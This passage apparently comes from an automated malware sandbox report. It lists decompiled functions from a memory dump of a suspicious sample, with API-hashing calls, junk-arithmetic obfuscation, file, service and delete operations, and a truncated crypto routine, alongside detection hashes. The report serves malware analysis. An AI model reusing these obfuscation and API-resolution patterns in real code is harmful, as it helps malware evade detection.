                                                      • Instruction ID: 8aaaab428069adbc48d01d1842b8f6c1b76137c32856cc0d43b623e32781480e
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: E911B372911148BBDF199FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E0023B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0023602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002407A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x0023b569
                                                      0x0023b56a
                                                      0x0023b56d
                                                      0x0023b572
                                                      0x0023b574
                                                      0x0023b577
                                                      0x0023b57a
                                                      0x0023b57d
                                                      0x0023b580
                                                      0x0023b583
                                                      0x0023b586
                                                      0x0023b587
                                                      0x0023b58a
                                                      0x0023b58d
                                                      0x0023b590
                                                      0x0023b593
                                                      0x0023b594
                                                      0x0023b595
                                                      0x0023b59a
                                                      0x0023b5a4
                                                      0x0023b5b8
                                                      0x0023b5c0
                                                      0x0023b5c4
                                                      0x0023b5cb
                                                      0x0023b5d2
                                                      0x0023b5d9
                                                      0x0023b5e6
                                                      0x0023b5fd
                                                      0x0023b604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(00240668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00240668,?,?,?,?), ref: 0023B5FD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: ae4d34fd2688908d7b37844e0c7cd486ab6290dc1b62701abbb9e3509a401dc7
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: E911C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E0024981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002407A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x00249821
                                                      0x00249822
                                                      0x00249825
                                                      0x00249828
                                                      0x0024982a
                                                      0x0024982c
                                                      0x0024982f
                                                      0x00249832
                                                      0x00249835
                                                      0x00249836
                                                      0x00249837
                                                      0x0024983c
                                                      0x00249855
                                                      0x00249858
                                                      0x0024985f
                                                      0x00249866
                                                      0x0024986d
                                                      0x00249874
                                                      0x0024987b
                                                      0x0024988e
                                                      0x0024989b
                                                      0x002498a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002387F2,0000CAAE,0000510C,AD82F196), ref: 0024989B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 5c104816d0916b2f742d7da5e2f5af63a7c104f2388a3feb003ea95f8739dd8b
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 78015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00247BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00247BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002407A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x00247bf7
                                                      0x00247bf8
                                                      0x00247bfa
                                                      0x00247bfd
                                                      0x00247bff
                                                      0x00247c02
                                                      0x00247c06
                                                      0x00247c07
                                                      0x00247c0f
                                                      0x00247c1d
                                                      0x00247c25
                                                      0x00247c2d
                                                      0x00247c31
                                                      0x00247c38
                                                      0x00247c3f
                                                      0x00247c46
                                                      0x00247c4a
                                                      0x00247c5e
                                                      0x00247c67
                                                      0x00247c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00247C67
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: 770df398bab2141a37eb02192e8c8783d3f149e98fc0c61528bafcf87d895afb
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 0A014FB190120CFFEB09DF94C84A8DEBBB9EF44314F108198F50567240E6B15F609B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E0023F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002407A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x0023f662
                                                      0x0023f663
                                                      0x0023f665
                                                      0x0023f668
                                                      0x0023f66a
                                                      0x0023f66d
                                                      0x0023f670
                                                      0x0023f673
                                                      0x0023f677
                                                      0x0023f678
                                                      0x0023f67d
                                                      0x0023f687
                                                      0x0023f693
                                                      0x0023f69a
                                                      0x0023f6a1
                                                      0x0023f6a5
                                                      0x0023f6a9
                                                      0x0023f6b0
                                                      0x0023f6c9
                                                      0x0023f6d8
                                                      0x0023f6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0023F6D8
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: b0aab0a77048a0e0be9577124c09f0a3f59ce9ddf5566f454e9b60349f3fc5fa
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: FC01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0023B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0023602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002407A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x0023b6f3
                                                      0x0023b6f8
                                                      0x0023b702
                                                      0x0023b70b
                                                      0x0023b712
                                                      0x0023b719
                                                      0x0023b720
                                                      0x0023b727
                                                      0x0023b72e
                                                      0x0023b747
                                                      0x0023b759
                                                      0x0023b75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0023B759
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 793f8dda759908818510c1c0dcc9dcb3ef21eb4d32d3cbd2049d11a1b0679531
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: D60178B2950308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0024AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002407A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x0024aa3f
                                                      0x0024aa40
                                                      0x0024aa41
                                                      0x0024aa44
                                                      0x0024aa47
                                                      0x0024aa4b
                                                      0x0024aa4c
                                                      0x0024aa51
                                                      0x0024aa5b
                                                      0x0024aa64
                                                      0x0024aa68
                                                      0x0024aa6f
                                                      0x0024aa76
                                                      0x0024aa8d
                                                      0x0024aa90
                                                      0x0024aa9d
                                                      0x0024aaa8
                                                      0x0024aaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0024AAA8
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: d30233234a1f3f2a51f3f54581c7389b96fb4482909fd5c53c65e4e98134fc17
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: BBF069B191020CFFDF08DF94DD4A89EBFB8EB40304F108088F905A6250D3B29B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 25%
                                                      			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                      0x1000745a
                                                      0x1000745c
                                                      0x1000745e
                                                      0x10007460
                                                      0x10007468

                                                      APIs
                                                      • _doexit.LIBCMT ref: 10007460
                                                        • Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
                                                        • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
                                                        • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
                                                        • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
                                                        • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                      • String ID:
                                                      • API String ID: 3712619029-0
                                                      • Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                                      • Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
                                                      • Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                                      • Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00239FDC, Relevance: 39.5, Strings: 31, Instructions: 734COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00239FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0023602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
